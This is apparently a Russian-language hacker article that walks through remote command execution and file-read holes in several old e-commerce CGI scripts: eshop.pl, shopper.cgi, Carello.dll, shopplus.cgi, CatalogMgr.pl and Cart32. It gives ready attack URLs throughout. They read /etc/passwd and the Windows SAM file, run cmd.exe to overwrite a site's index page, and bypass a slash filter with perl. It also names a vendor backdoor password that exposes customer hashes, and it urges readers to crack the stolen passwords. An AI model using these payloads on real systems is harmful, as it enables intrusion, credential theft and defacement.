| » Главная |
|
О том, как
люди достают креды из шопов.[eshop.pl]
Полное название: Webdiscount E-Shop Online Shop System.
Диагноз: Удалённое исполнение команд на сервере.
Example:
www.host.com/cgi-bin/eshop.pl?seite=;ls|( www.host.com- атакуемый сайт)
Описание: В самом коде скрипта отсутствует большинство проверок на метасимволы.
Единственная проверка это:
If ((index($seite, "/") >=0) || (index($seite, "..")
>=0))
{
print "a";
exit(0);
}
что говорит
о том, что скрипт отфильтровывает
из аргумента только символы "/" и "..".
Это затрудняет использование уязвимости,
но всё-таки позволяет выполнять ЛЮБЫЕ
команды, даже те, в которых есть символ "/".
Использование: Мы не можем использовать символ "/",
но что нам мешает его сгенерировать
при помощи пёрла и подставить его в команду?
Вместо "/" подставляем в команду вот такую
конструкцию 'perl-e'print "\x2f"x1'' (Вместе со ВСЕМИ
кавычками и апострофами!). Теперь,
чтобы сделать листинг корневой директории, нам
надо всего лишь ввести в браузере:
www.host.com/cgi-bin/eshop.pl?seite=;ls -la 'perl -e'print
"\x2f"x1' ' (листинг корня диска)
www.host.com/cgi-bin/eshop.pl?seite=;cat 'perl -e'print
"\x2f"x1''etc'perl -e 'print "\x2f"x1''passwd (пароли).
Но в последнее время такая уязвимость стала редкостью,
так что если найдёшь такую дыру
считай тебе повезло.[shopper.cgi]
Полное название: Bytes Interactive's Web Shopper (sopper.cgi)
Version 2.0 (и ниже).
Диагноз: Удалённое исполнение команд на сервере.
Example:
www.host.com/cgi-bin/shopper.cgi?new-page=../../../../etc/passwd
Описание: Посмотри на этот кусок кода:
#$debug=1
if ($debug) {
…
foreach $vl (keys (%VALUES)) {
$er2= ( $VALUES{$vl} =~
/(\[|;|>|<|&|\*|'|\\|]|\^|\||\?|'|~|\(|\)|\{|}|\$|\r|\n)/);
# Remove any insecure relative path parts
$page = s/(\/\.\.\/)*//g;
$page = s/(\.\.\/)*//g;
$page = s/(.\/)*//g;
Видишь, вроде как всё чисто, но всё это работать будет
только в том случае, если переменная
$debug равна еденице, но в коде она равна еденице, но закомментирована!
Следовательно,
переменная равна нулю. Тогда вся эта заумная проверка не работает, а стоит
здесь для мебели.
Следовательно, параметр скрипта не проверяется на
различные метасимволы, и мы можем
творить с серваком абсолютно всё что нам
заблагорассудится.
В сети достаточно таких багов.[carello.dll]
Полное название: Carello E-Commerce V1.2.1 for Windows NT
(1.3 уже не подойдёт).
Диагноз: Удалённое исполнение команд на сервере.
Example:
www.host.com/scripts/Carello/ Carello.dll?CARELLOCODE=SITE2&VBEXE=
C:\..\..\..\winnt\system32\cmd.exe
%20/c%20echo%20test>c:\zlo.txt (всё одной строкой)
Описание: Программа в своём аргументе прописывает
абсолютные пути к своим
запускаемым скриптам, поэтому мы можем без проблем
исполнить на сервере любую
команду, например, "type c:\winnt\repair\sam". Полученные
таким образом пароли
остаётся только полофтить и вытрясти из серванта
всё, что там есть.
Таких уязвимостей в сети осталось примерно около 1%
от всего количества онлайн- магазинов.[shopplus.cgi]
Полное название: ShopPlus Shopping Cart.
Диагноз: Удалённое исполнение команд на сервере.
Example:
www.host.com/scripts/shopplus.cgi?dn=www.host.com&cartid=
host.com&file=;cat%20/etc/passwd|
Описание: Как обычно бывает, этот скрипт передаёт
процедуре open() параметр, который
ни на что не проверяется. Поэтому мы можем рулить
удалённым серваком удалённо без
особых затрат сил, времени и мозгов. Требуется только
найти такой скрипт.
Если ты найдёшь такой считай себя c00l haX0r.
[CatalogMgr.pl]
Полное название: VirtualCart Shopping Cart.
Диагноз: Чтение любого файла на сервере.
Example:
www.host.com/cgi-bin/CatalogMgr.pl?cartID=
www.host.com&template=CatalogMgr.pl
Описание: Чтение любого файла с диска? Нет, не только.
Скрипт повсеместно и со всех
аргументов отфильтровывает символы '|' и '/' , но не отфильтровывает обратный
апостроф '
, который, в свою очередь, тоже позволяет исполнять
команды. Т.е. мы можем немного
помучить такую вещь, как 'perl -e 'print"\x (КОД ТРЕБУЕМОГО СИМВОЛА
В ТАБЛИЦЕ ASCII)"x1''
, и получить как раз тот символ, который скрипт так
старательно отфильтровывал. Хочу сказать
что если ты подставишь в уязвимый урл выражение
'perl -e 'print "\x (КОД ТРЕБУЕМОГО СИМВОЛА
В ТАБЛИЦЕ ASCII)"x1'' и больше ничего, то ничего работать
не будет, так как команда, заключённая в
обратные апострофы, исполняется, а её вывод
( то есть то, что появится после выполнения команды,
например, на терминале)подставится в исходную команду. Например, 'perl
-e 'print "Is"x1'' покажет тебе
листинг текущего каталога. Я думаю для тебя будет не
сложно соорудить выражение, которое будет
открывать, например, файл "Is-I/etc|", а на самом деле делать
листинг директории /etc.[cart32.exe]Полное название: McMurtey/Whitaker
& Associates Cart32 Shopping System.
Диагноз: Пользование всей базы заказов и исполнение команд
на сервере, DoS-атака.
Example:
(1)www.host.com/cgi-bin/cart32.exe/cart32clientlist
(2)www.host.com/cgi-bin/c32web.exe
(3)www.host.com/cgi-bin/c32web.exe/show-progress
(4)www.host.com/cgibin/ c32web.exe?tabname=cart32%2B&action=save+cart32%2B+
tab&savetab=cart32%2
Bclient=!Loginname!&clientpassword=!password!&Admin=
&adminpassword=&tabtosave=cart32%2
Bplustabtosave=run+external+program&usecmdline=yes&cmdline=
cmd.exe+echo+hello,world
!>c:/inetpub/wwwroot/www.host.com/index.htm
(5)www.host.com/cgi-bin/cart32.exe/expdate
Описание: Использовать эту уязвимость можно на корзинках версии меньше
3.5а.
Для использования данной корзинки надо для начала
попробовать её с параметром cart32clientlist.
В случае, если она спросит пароль, то смело вводи "Wemilo"
(это бэкдор, заботливо оставленный нам
разработчиками) и наслаждайся листингом пользователей корзинки (вместе
с хешированными
паролями и прочей конфиденциальной инфой ;) Далее
пробуем скрипт c32web.exe. При его
запросе он спрашивает у тебя логин, а потом пароль
(декриптор паролей при желании можно
найти даже на яндексе). Вводим только что увиденные
пароли и потом просто нажимаем на батон
"Show orders(non-secure)".
В WWW эту уязвимость использовали все и много, но всё
же таких дыр навалом в сети.
Вот вам и весь взлом =)
Автор неизвестен.
|